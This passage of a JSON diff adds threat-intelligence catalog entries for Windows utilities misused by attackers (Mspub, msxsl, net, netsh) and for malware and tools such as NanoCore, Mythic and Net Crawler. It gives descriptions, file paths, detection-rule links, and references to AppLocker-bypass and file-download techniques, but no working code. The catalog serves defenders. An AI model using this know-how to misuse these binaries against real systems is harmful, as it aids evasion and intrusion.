+ "874c053b-d6b8-42c2-accc-cd256bb4d350", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "fc985102-ca75-491e-8eac-ba8ce06670e2", + "type": "similar" + } + ], + "uuid": "d316ab94-0420-4356-a3bb-f92f42a4247c", + "value": "MsoHtmEd" + }, + { + "description": "[[Mspub.exe - LOLBAS Project](/references/41eff63a-fef0-4b4b-86f7-0908150fcfcf)]", + "meta": { + "id": "4f6e6932-0d33-48b1-a3e1-d84e3c5fd279", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "c07f48ee-4667-4dd3-aa8e-cb6d588c547c", + "type": "similar" + } + ], + "uuid": "b36cdee2-05cb-44fb-853d-299e0a90165e", + "value": "Mspub.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Publisher\n\n**Author:** Nir Chako\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSPUB.exe\n* C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSPUB.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSPUB.exe\n* C:\\Program Files\\Microsoft Office\\Office16\\MSPUB.exe\n* C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSPUB.exe\n* C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSPUB.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSPUB.exe\n* C:\\Program Files\\Microsoft Office\\Office15\\MSPUB.exe\n* C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSPUB.exe\n* C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSPUB.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.exe\n* C:\\Program Files\\Microsoft Office\\Office14\\MSPUB.exe\n\n**Resources:**\nNone Provided\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_mspub_download.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml)\n* IOC: Suspicious Office application internet/network traffic[[Mspub.exe - LOLBAS Project](/references/41eff63a-fef0-4b4b-86f7-0908150fcfcf)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5228", + "source": "Tidal Cyber", + "tags": [ + "a523dcb0-9181-4170-a113-126df84594ca", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "b36cdee2-05cb-44fb-853d-299e0a90165e", + "type": "similar" + } + ], + "uuid": "c07f48ee-4667-4dd3-aa8e-cb6d588c547c", + "value": "Mspub" + }, + { + "description": "[[msxsl.exe - LOLBAS Project](/references/4e1ed0a8-60d0-45e2-9592-573b904811f8)]", + "meta": { + "id": "02d62b59-e68d-4bbc-af64-302507b16897", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "8cccbfed-3f78-45fd-b5d1-efe884d28f09", + "type": "similar" + } + ], + "uuid": "9ccccfe2-f653-42f7-9e36-3158781f4e2a", + "value": "msxsl.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Command line utility used to perform XSL transformations.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* no default\n\n**Resources:**\n* [https://twitter.com/subTee/status/877616321747271680](https://twitter.com/subTee/status/877616321747271680)\n* [https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker](https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker)\n* [https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file](https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file)\n\n**Detection:**\n* Sigma: [proc_creation_win_wmic_xsl_script_processing.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml)\n* Elastic: [defense_evasion_msxsl_beacon.toml](https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml)\n* Elastic: [defense_evasion_msxsl_network.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)[[msxsl.exe - LOLBAS Project](/references/4e1ed0a8-60d0-45e2-9592-573b904811f8)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5229", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "58db02e6-d908-47c2-bc82-ed58ada61331", + "type": "used-by" + }, + { + "dest-uuid": "9ccccfe2-f653-42f7-9e36-3158781f4e2a", + "type": "similar" + } + ], + "uuid": "8cccbfed-3f78-45fd-b5d1-efe884d28f09", + "value": "msxsl" + }, + { + "description": "[MURKYTOP](https://app.tidalcyber.com/software/768111f9-0948-474b-82a6-cd5455079513) is a reconnaissance tool used by [Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871). [[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0233", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "used-by" + }, + { + "dest-uuid": "049ff071-0b3c-4712-95d2-d21c6aa54501", + "type": "similar" + } + ], + "uuid": "768111f9-0948-474b-82a6-cd5455079513", + "value": "MURKYTOP" + }, + { + "description": "[Mythic](https://app.tidalcyber.com/software/f1398367-a0af-4a89-b240-50cae4985ed9) is an open source, cross-platform post-exploitation/command and control platform. [Mythic](https://app.tidalcyber.com/software/f1398367-a0af-4a89-b240-50cae4985ed9) is designed to \"plug-n-play\" with various agents and communication channels.[[Mythic Github](https://app.tidalcyber.com/references/20d0adf0-b832-4b03-995e-dfb56474ddcc)][[Mythic SpecterOps](https://app.tidalcyber.com/references/98d4453e-2e80-422a-ac8c-47f650f46e3c)][[Mythc Documentation](https://app.tidalcyber.com/references/de3091b4-663e-4d9e-9dde-51250749863d)] Deployed [Mythic](https://app.tidalcyber.com/software/f1398367-a0af-4a89-b240-50cae4985ed9) C2 servers have been observed as part of potentially malicious infrastructure.[[RecordedFuture 2021 Ad Infra](https://app.tidalcyber.com/references/d509e6f2-c317-4483-a51e-ad15a78a12c0)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S0699", + "source": "MITRE", + "tags": [ + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", + "e81ba503-60b0-4b64-8f20-ef93e7783796" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d505fc8b-2e64-46eb-96d6-9ef7ffca5b66", + "type": "similar" + } + ], + "uuid": "f1398367-a0af-4a89-b240-50cae4985ed9", + "value": "Mythic" + }, + { + "description": "[Naid](https://app.tidalcyber.com/software/5cfd6135-c53b-4234-a17e-759494b2101f) is a trojan used by [Elderwood](https://app.tidalcyber.com/groups/51146bb6-7478-44a3-8f08-19adcdceffca) to open a backdoor on compromised hosts. [[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)] [[Symantec Naid June 2012](https://app.tidalcyber.com/references/dc3c16b3-e06b-4b56-b6bd-b98a0b39df3b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0205", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "51146bb6-7478-44a3-8f08-19adcdceffca", + "type": "used-by" + }, + { + "dest-uuid": "48523614-309e-43bf-a2b8-705c2b45d7b2", + "type": "similar" + } + ], + "uuid": "5cfd6135-c53b-4234-a17e-759494b2101f", + "value": "Naid" + }, + { + "description": "[NanHaiShu](https://app.tidalcyber.com/software/0e28dfc9-8948-4c08-b7d8-9e80e19cc464) is a remote access tool and JScript backdoor used by [Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871). [NanHaiShu](https://app.tidalcyber.com/software/0e28dfc9-8948-4c08-b7d8-9e80e19cc464) has been used to target government and private-sector organizations that have relations to the South China Sea dispute. [[Proofpoint Leviathan Oct 2017](https://app.tidalcyber.com/references/f8c2b67b-c097-4b48-8d95-266a45b7dd4d)] [[fsecure NanHaiShu July 2016](https://app.tidalcyber.com/references/41984650-a0ac-4445-80b6-7ceaf93bd135)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0228", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "used-by" + }, + { + "dest-uuid": "705f0783-5f7d-4491-b6b7-9628e6e006d2", + "type": "similar" + } + ], + "uuid": "0e28dfc9-8948-4c08-b7d8-9e80e19cc464", + "value": "NanHaiShu" + }, + { + "description": "[NanoCore](https://app.tidalcyber.com/software/db05dbaa-eb3a-4303-b37e-18d67e7e85a1) is a modular remote access tool developed in .NET that can be used to spy on victims and steal information. It has been used by threat actors since 2013.[[DigiTrust NanoCore Jan 2017](https://app.tidalcyber.com/references/6abac972-bbd0-4cd2-b3a7-25e7825ac134)][[Cofense NanoCore Mar 2018](https://app.tidalcyber.com/references/de31ba54-5634-48c5-aa57-c6b0dbb53870)][[PaloAlto NanoCore Feb 2016](https://app.tidalcyber.com/references/caa0a421-04b0-4ebc-b365-97082d69d33d)][[Unit 42 Gorgon Group Aug 2018](https://app.tidalcyber.com/references/d0605185-3f8d-4846-a718-15572714e15b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0336", + "source": "MITRE", + "tags": [ + "4d767e87-4cf6-438a-927a-43d2d0beaab7", + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "99bbbe25-45af-492f-a7ff-7cbc57828bac", + "type": "used-by" + }, + { + "dest-uuid": "fcc6d937-8cd6-4f2c-adb8-48caedbde70a", + "type": "used-by" + }, + { + "dest-uuid": "e47ae2a7-d34d-4528-ba67-c9c07daa91ba", + "type": "used-by" + }, + { + "dest-uuid": "efb3b5ac-cd86-44a2-9de1-02e4612b8cc2", + "type": "used-by" + }, + { + "dest-uuid": "b4d80f8b-d2b9-4448-8844-4bef777ed676", + "type": "similar" + } + ], + "uuid": "db05dbaa-eb3a-4303-b37e-18d67e7e85a1", + "value": "NanoCore" + }, + { + "description": "[NativeZone](https://app.tidalcyber.com/software/a814fd1d-8c2c-41b3-bb3a-30c4318c74c0) is the name given collectively to disposable custom [Cobalt Strike](https://app.tidalcyber.com/software/9b6bcbba-3ab4-4a4c-a233-cd12254823f6) loaders used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least 2021.[[MSTIC Nobelium Toolset May 2021](https://app.tidalcyber.com/references/52464e69-ff9e-4101-9596-dd0c6404bf76)][[SentinelOne NobleBaron June 2021](https://app.tidalcyber.com/references/98cf2bb0-f36c-45af-8d47-bf26aca3bb09)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0637", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "b4783be3-35d9-4a56-ac8d-1f3e1c9d9a84", + "type": "similar" + } + ], + "uuid": "a814fd1d-8c2c-41b3-bb3a-30c4318c74c0", + "value": "NativeZone" + }, + { + "description": "[NavRAT](https://app.tidalcyber.com/software/b410d30c-4db6-4239-950e-9b0e0521f0d2) is a remote access tool designed to upload, download, and execute files. It has been observed in attacks targeting South Korea. [[Talos NavRAT May 2018](https://app.tidalcyber.com/references/f644ac27-a923-489b-944e-1ba89c609307)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0247", + "source": "MITRE", + "tags": [ + "16b47583-1c54-431f-9f09-759df7b5ddb7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "013fdfdc-aa32-4779-8f6e-7920615cbf66", + "type": "used-by" + }, + { + "dest-uuid": "53a42597-1974-4b8e-84fd-3675e8992053", + "type": "similar" + } + ], + "uuid": "b410d30c-4db6-4239-950e-9b0e0521f0d2", + "value": "NavRAT" + }, + { + "description": "[NBTscan](https://app.tidalcyber.com/software/950f13e6-3ae3-411e-a2b2-4ba1afe6cb76) is an open source tool that has been used by state groups to conduct internal reconnaissance within a compromised network.[[Debian nbtscan Nov 2019](https://app.tidalcyber.com/references/8d718be1-9695-4e61-a922-5162d88477c0)][[SecTools nbtscan June 2003](https://app.tidalcyber.com/references/505c9e8b-66e0-435c-835f-b4405ba91966)][[Symantec Waterbug Jun 2019](https://app.tidalcyber.com/references/ddd5c2c9-7126-4b89-b415-dc651a2ccc0e)][[FireEye APT39 Jan 2019](https://app.tidalcyber.com/references/ba366cfc-cc04-41a5-903b-a7bb73136bc3)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S0590", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "e5b0da2b-12bc-4113-9459-9c51329c9ae0", + "type": "used-by" + }, + { + "dest-uuid": "646e35d2-75de-4c1d-8ad3-616d3e155c5e", + "type": "used-by" + }, + { + "dest-uuid": "15ff1ce0-44f0-4f1d-a4ef-83444570e572", + "type": "used-by" + }, + { + "dest-uuid": "4a4641b1-7686-49da-8d83-00d8013f4b47", + "type": "used-by" + }, + { + "dest-uuid": "a57b52c7-9f64-4ffe-a7c3-0de738fb2af1", + "type": "used-by" + }, + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c", + "type": "used-by" + }, + { + "dest-uuid": "b63970b7-ddfb-4aee-97b1-80d335e033a8", + "type": "similar" + } + ], + "uuid": "950f13e6-3ae3-411e-a2b2-4ba1afe6cb76", + "value": "NBTscan" + }, + { + "description": "[nbtstat](https://app.tidalcyber.com/software/81c2fc9b-8c2c-40f6-a327-dcdd64b70a7e) is a utility used to troubleshoot NetBIOS name resolution. [[TechNet Nbtstat](https://app.tidalcyber.com/references/1b1e6b08-fc2a-48f7-82bd-e3c1a7a0d97e)]", + "meta": { + "platforms": [], + "software_attack_id": "S0102", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "b35068ec-107a-4266-bda8-eb7036267aea", + "type": "similar" + } + ], + "uuid": "81c2fc9b-8c2c-40f6-a327-dcdd64b70a7e", + "value": "nbtstat" + }, + { + "description": "[NDiskMonitor](https://app.tidalcyber.com/software/6d42e6c5-3056-4ff1-8d5d-a736807ec84c) is a custom backdoor written in .NET that appears to be unique to [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a). [[TrendMicro Patchwork Dec 2017](https://app.tidalcyber.com/references/15465b26-99e1-4956-8c81-cda3388169b8)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0272", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "32385eba-7bbf-439e-acf2-83040e97165a", + "type": "used-by" + }, + { + "dest-uuid": "d1183cb9-258e-4f2f-8415-50ac8252c49e", + "type": "similar" + } + ], + "uuid": "6d42e6c5-3056-4ff1-8d5d-a736807ec84c", + "value": "NDiskMonitor" + }, + { + "description": "[Nebulae](https://app.tidalcyber.com/software/38510bab-aece-4d7b-b621-7594c2c4fe14) Is a backdoor that has been used by [Naikon](https://app.tidalcyber.com/groups/a80c00b2-b8b6-4780-99bb-df8fe921947d) since at least 2020.[[Bitdefender Naikon April 2021](https://app.tidalcyber.com/references/55660913-4c03-4360-bb8b-1cad94bd8d0e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0630", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a80c00b2-b8b6-4780-99bb-df8fe921947d", + "type": "used-by" + }, + { + "dest-uuid": "22b17791-45bf-45c0-9322-ff1a0af5cf2b", + "type": "similar" + } + ], + "uuid": "38510bab-aece-4d7b-b621-7594c2c4fe14", + "value": "Nebulae" + }, + { + "description": "[Neoichor](https://app.tidalcyber.com/software/8662e29e-5766-4311-894e-5ca52515ccbe) is C2 malware used by [Ke3chang](https://app.tidalcyber.com/groups/26c0925f-1a3c-4df6-b27a-62b9731299b8) since at least 2019; similar malware families used by the group include Leeson and Numbldea.[[Microsoft NICKEL December 2021](https://app.tidalcyber.com/references/29a46bb3-f514-4554-ad9c-35f9a5ad9870)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0691", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "26c0925f-1a3c-4df6-b27a-62b9731299b8", + "type": "used-by" + }, + { + "dest-uuid": "4d7bf2ac-f953-4907-b114-be44dc174d67", + "type": "similar" + } + ], + "uuid": "8662e29e-5766-4311-894e-5ca52515ccbe", + "value": "Neoichor" + }, + { + "description": "[Nerex](https://app.tidalcyber.com/software/de8b18c9-ebab-4126-96a9-282fa8829877) is a Trojan used by [Elderwood](https://app.tidalcyber.com/groups/51146bb6-7478-44a3-8f08-19adcdceffca) to open a backdoor on compromised hosts. [[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)] [[Symantec Nerex May 2012](https://app.tidalcyber.com/references/1613fd6b-4d62-464b-9cda-6f7d3f0192e1)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0210", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "51146bb6-7478-44a3-8f08-19adcdceffca", + "type": "used-by" + }, + { + "dest-uuid": "c251e4a5-9a2e-4166-8e42-442af75c3b9a", + "type": "similar" + } + ], + "uuid": "de8b18c9-ebab-4126-96a9-282fa8829877", + "value": "Nerex" + }, + { + "description": "", + "meta": { + "id": "122c29f6-c5ae-4039-9a1c-9518b7478a08" + }, + "related": [ + { + "dest-uuid": "c9b8522f-126d-40ff-b44e-1f46098bd8cc", + "type": "similar" + } + ], + "uuid": "ef9df548-c7c2-41fd-96f1-acdb9e8a763c", + "value": "net.exe" + }, + { + "description": "The [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. [[Microsoft Net Utility](https://app.tidalcyber.com/references/75998d1c-69c0-40d2-a64b-43ad8efa05da)]\n\n[Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) has a great deal of functionality, [[Savill 1999](https://app.tidalcyber.com/references/e814d4a5-b846-4d68-ac00-7021238d287a)] much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd) using net use commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as net1 user.", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0039", + "source": "MITRE", + "tags": [ + "4e7ae33d-e040-4618-bccf-3b5e4aac81ed", + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "26c0925f-1a3c-4df6-b27a-62b9731299b8", + "type": "used-by" + }, + { + "dest-uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "type": "used-by" + }, + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "ca93af75-0ffa-4df4-b86a-92d4d50e496e", + "type": "used-by" + }, + { + "dest-uuid": "5825a840-5577-4ffc-a08d-3f48d64395cb", + "type": "used-by" + }, + { + "dest-uuid": "43f826a1-e8c8-47b8-9b00-38e1b3e4293b", + "type": "used-by" + }, + { + "dest-uuid": "8567136b-f84a-45ed-8cce-46324c7da60e", + "type": "used-by" + }, + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "a80c00b2-b8b6-4780-99bb-df8fe921947d", + "type": "used-by" + }, + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "used-by" + }, + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "used-by" + }, + { + "dest-uuid": "3290dcb9-5781-4b87-8fa0-6ae820e152cd", + "type": "used-by" + }, + { + "dest-uuid": "863b7013-133d-4a82-93d2-51b53a8fd30e", + "type": "used-by" + }, + { + "dest-uuid": "5307bba1-2674-4fbd-bfd5-1db1ae06fc5f", + "type": "used-by" + }, + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "used-by" + }, + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "7c3ef21c-0e1c-43d5-afb0-3a07c5a66937", + "type": "used-by" + }, + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "type": "used-by" + }, + { + "dest-uuid": "dfbce236-735c-436d-b433-933bd6eae17b", + "type": "used-by" + }, + { + "dest-uuid": "15ff1ce0-44f0-4f1d-a4ef-83444570e572", + "type": "used-by" + }, + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "472080b0-e3d4-4546-9272-c4359fe856e1", + "type": "used-by" + }, + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "used-by" + }, + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "used-by" + }, + { + "dest-uuid": "0610cd57-2511-467a-97e3-3c810384074f", + "type": "used-by" + }, + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "used-by" + }, + { + "dest-uuid": "0f86e871-0c6c-4227-ae28-3f3696d6ae9d", + "type": "used-by" + }, + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "99bbbe25-45af-492f-a7ff-7cbc57828bac", + "type": "used-by" + }, + { + "dest-uuid": "b3061284-0335-4dcb-9f8e-a3b0412fd46f", + "type": "used-by" + }, + { + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "type": "similar" + }, + { + "dest-uuid": "ef9df548-c7c2-41fd-96f1-acdb9e8a763c", + "type": "similar" + } + ], + "uuid": "c9b8522f-126d-40ff-b44e-1f46098bd8cc", + "value": "Net" + }, + { + "description": "", + "meta": { + "id": "d7d0d6a4-b821-4e97-8bab-96d16952e7f2" + }, + "related": [ + { + "dest-uuid": "947c6212-4da8-48dd-9da9-ce4b077dd759", + "type": "similar" + } + ], + "uuid": "edb7867e-195e-4a88-9198-f118a64af6b0", + "value": "NetC" + }, + { + "description": "[Net Crawler](https://app.tidalcyber.com/software/947c6212-4da8-48dd-9da9-ce4b077dd759) is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) to execute a copy of [Net Crawler](https://app.tidalcyber.com/software/947c6212-4da8-48dd-9da9-ce4b077dd759). [[Cylance Cleaver](https://app.tidalcyber.com/references/f0b45225-3ec3-406f-bd74-87f24003761b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0056", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "c8cc6ce8-d421-42e6-a6eb-2ea9d2d9ab07", + "type": "used-by" + }, + { + "dest-uuid": "fde50aaa-f5de-4cb8-989a-babb57d6a704", + "type": "similar" + }, + { + "dest-uuid": "edb7867e-195e-4a88-9198-f118a64af6b0", + "type": "similar" + } + ], + "uuid": "947c6212-4da8-48dd-9da9-ce4b077dd759", + "value": "Net Crawler" + }, + { + "description": "[NETEAGLE](https://app.tidalcyber.com/software/852c300d-9313-442d-9b49-9883522c3f4b) is a backdoor developed by [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) with compile dates as early as 2008. It has two main variants known as “Scout” and “Norton.” [[FireEye APT30](https://app.tidalcyber.com/references/c48d2084-61cf-4e86-8072-01e5d2de8416)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0034", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "be45ff95-6c74-4000-bc39-63044673d82f", + "type": "used-by" + }, + { + "dest-uuid": "53cf6cc4-65aa-445a-bcf8-c3d296f8a7a2", + "type": "similar" + } + ], + "uuid": "852c300d-9313-442d-9b49-9883522c3f4b", + "value": "NETEAGLE" + }, + { + "description": "", + "meta": { + "id": "76a58587-87cf-41d3-bb5a-dd3f7dfd8b48" + }, + "related": [ + { + "dest-uuid": "803192b8-747b-4108-ae15-2d7481d39162", + "type": "similar" + } + ], + "uuid": "f0875544-e774-4ba7-8ed3-c9828ea69fbd", + "value": "netsh.exe" + }, + { + "description": "[netsh](https://app.tidalcyber.com/software/803192b8-747b-4108-ae15-2d7481d39162) is a scripting utility used to interact with networking components on local or remote systems. [[TechNet Netsh](https://app.tidalcyber.com/references/58112a3a-06bd-4a46-8a09-4dba5f42a04f)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0108", + "source": "MITRE", + "tags": [ + "064dc489-6b50-4cc1-bb9b-fe722f21aaf1", + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "303a3675-4855-4323-b042-95bb1d907cca", + "84615fe0-c2a5-4e07-8957-78ebc29b4635", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "72d9bea7-9ca1-43e6-8702-2fb7fb1355de", + "type": "used-by" + }, + { + "dest-uuid": "3290dcb9-5781-4b87-8fa0-6ae820e152cd", + "type": "used-by" + }, + { + "dest-uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "type": "used-by" + }, + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "used-by" + }, + { + "dest-uuid": "a80c00b2-b8b6-4780-99bb-df8fe921947d", + "type": "used-by" + }, + { + "dest-uuid": "472080b0-e3d4-4546-9272-c4359fe856e1", + "type": "used-by" + }, + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "used-by" + }, + { + "dest-uuid": "5a63f900-5e7e-4928-a746-dd4558e1df71", + "type": "similar" + }, + { + "dest-uuid": "f0875544-e774-4ba7-8ed3-c9828ea69fbd", + "type": "similar" + } + ], + "uuid": 